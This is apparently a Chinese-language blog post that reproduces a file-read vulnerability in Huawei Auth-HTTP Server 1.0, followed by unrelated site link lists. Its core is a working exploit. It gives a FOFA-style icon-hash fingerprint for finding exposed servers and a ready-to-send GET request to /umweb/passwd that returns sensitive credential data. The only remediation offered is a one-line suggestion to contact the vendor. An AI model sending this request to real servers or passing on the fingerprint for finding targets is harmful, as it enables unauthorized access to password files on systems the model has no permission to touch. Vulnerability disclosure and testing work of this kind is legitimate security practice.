【漏洞复现】华为Auth-Http服务文件读取漏洞

Nx01 产品简介

        Huawei Auth-HTTP Server 1.0 可以实现基于角色的访问控制,通过用户的身份认证和权限控制,确保只有经过授权的用户可以访问特定的资源和服务。它支持常见的身份认证协议和技术,如LDAP、RADIUS、TACACS+等,能够与企业现有的认证系统无缝集成,提供一致的认证体验。

Nx02 漏洞描述

       华为Auth-Http服务存在文件读取漏洞。访问umweb/passwd可以读取文件敏感信息。

Nx03 产品主页

        web.icon=="be2408ce4716a5cfc50dd0ada76619d6"

Nx04 漏洞复现

POC:

GET /umweb/passwd HTTP/1.1
Host: {
  {Hostname}}
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Nx05 修复建议

        建议联系软件厂商进行处理。

相关推荐

最近更新

  1. openssl error:0A000126:SSL routines:ssl3_read_n:unexpected eof

    2023-12-19 08:00:04       0 阅读
  2. 各种软件启动方式

    2023-12-19 08:00:04       0 阅读
  3. 【创作纪念日】我的三周年创作纪念日

    2023-12-19 08:00:04       1 阅读
  4. Github 2024-07-07 开源项目日报 Top10

    2023-12-19 08:00:04       1 阅读
  5. 部署LVS-DR群集

    2023-12-19 08:00:04       1 阅读
  6. python的列表推导式

    2023-12-19 08:00:04       1 阅读

热门阅读

  1. MySQL数据库的缓存

    2023-12-19 08:00:04       41 阅读
  2. Vue中表单数据和过滤器的简单使用

    2023-12-19 08:00:04       36 阅读
  3. 51单片机4线并发IO口控制1602LCD

    2023-12-19 08:00:04       39 阅读
  4. 第五章 图论 邻接矩阵存图

    2023-12-19 08:00:04       31 阅读
  5. strings

    2023-12-19 08:00:04       38 阅读
  6. Rust 嵌入式开发

    2023-12-19 08:00:04       41 阅读
  7. 【Rust 学习笔记】References and Borrowing

    2023-12-19 08:00:04       39 阅读
  8. jQuery Ajax 缓存

    2023-12-19 08:00:04       44 阅读
  9. NPM:编程世界的万能胶水

    2023-12-19 08:00:04       50 阅读
  10. lua语法

    lua语法

    2023-12-19 08:00:04      33 阅读
  11. 设计模式详解---模板方法模式

    2023-12-19 08:00:04       29 阅读
  12. 聚类算法之K-均值聚类

    2023-12-19 08:00:04       40 阅读